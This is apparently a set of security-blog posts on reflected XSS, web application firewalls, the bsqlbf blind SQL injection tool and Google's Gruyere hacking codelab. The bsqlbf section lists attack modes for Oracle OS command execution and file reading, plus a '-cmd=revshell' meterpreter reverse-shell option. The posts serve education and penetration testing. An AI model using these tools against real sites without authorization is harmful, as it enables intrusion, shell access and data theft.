Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Session Hijacking(Stealing session)
• Malware Attack
• Website Defacement
• Denial of Service attacks(Dos)

Bypassing The XSS Filter Technique: XSS Tutorial Part 2

Reference:

Latest XSS vulnerabilityAttacks

Mass Iframe Injection Tutorials

Disclaimer:

This article is intended for educational purpose only.

Introduction to Web Application Firewall (WAF) ~ Website Security

What is WAF?WAF is expanded as Web Application Firewall. WAF is server side application that controls the input and output(filter the HTTP communication).  It controls network traffic on any OSI Layer up to Application Layer.  The main purpose of WAF is to provide better protection over the top Wep Application vulnerability such as XSS(Cross Site Scripting), SQL Injection,RFI.  Daily lot of websites hacked because of these vulnerability.  Read Our Security News Section to know about the Security Risks in Interent.  Standard firewall blocks Non-HTTP attacks(restriction of ports,access..).  This WAF blocks HTTP attack.

The Most common Web Application Vulnerabilities:

• SQL Injection(SQLi)
• Cross-Site Scripting (XSS)
• Broken Authentication and Session Management
• Insecure Direct Object References
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Insecure Cryptographic Storage
• Failure to Restrict URL Access
• Insufficient Transport Layer Protection
• Unvalidated Redirects and Forwards

The Wep Application Firewall(WAF) must meat the following features:

• Protection Against Top Vulnerability(XSS,SQLi,..etc)
• Very Few False Positives (i.e., should NEVER disallow an authorized request)
• Strength of Default (Out of the Box) Defenses
• Power and Ease of Learn Mode
• Types of Vulnerabilities it can prevent.
• Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
• Both Positive and Negative Security model support.
• Simplified and Intuitive User Interface.
• Cluster mode support.
• High Performance (milliseconds latency).
• Complete Alerting, Forensics, Reporting capabilities.
• Web Services\XML support.
• Brute Force protection.
• Ability to Active (block and log), Passive (log only) and bypass the web trafic.
• Ability to keep individual users constrained to exactly what they have seen in the current session
• Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
• Form Factor: Software vs. Hardware (Hardware generally preferred)

Top 10 Open Source Web Application Firefwall(WAF):

1. ModSecurity (Trustwave SpiderLabs)
2. AQTRONIX WebKnight
3. ESAPI WAF
4. WebCastellum
5. BinarySec
6. Guardian@JUMPERZ.NET
7. OpenWAF
8. Ironbee
9. Profense
10. Smoothwall

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

What is Blind SQL Injection:

Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections

Supported Database:

• MS-SQL
• MySQL
• PostgreSQL
• Oracle

The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

SType 0 (default) is based on java..will NOT work against XE.

SType 1 is against oracle 9 with plsql_native_make_utility.

SType 2 is against oracle 10 with dbms_scheduler.

Download Now

Disclaimer:

This Article is for Education purpose only.  The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability. 

Learn Web Application Exploits and Defenses for free~Penetration Testing

Are you willing to Learn Web Application Exploitation and Defense against that? Here is the chance for you.   Google Labs provides a Lab to learn Web Application for free of cost.


Penetration Testing :

• Learn how hackers find security vulnerabilities!
• Learn how hackers exploit web applications!
• Learn how to stop them! 

This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:

• How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
• How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.

To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Gruyere 

This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking. In black box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view http headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests. In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code. You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

They'll tag each challenge to indicate which techniques are required to solve them: 

Challenges that can be solved just by using black box techniques.

Challenges that require that you look at the Gruyere source code.

Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

WARNING: 

Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 

Start Penetration Testing Now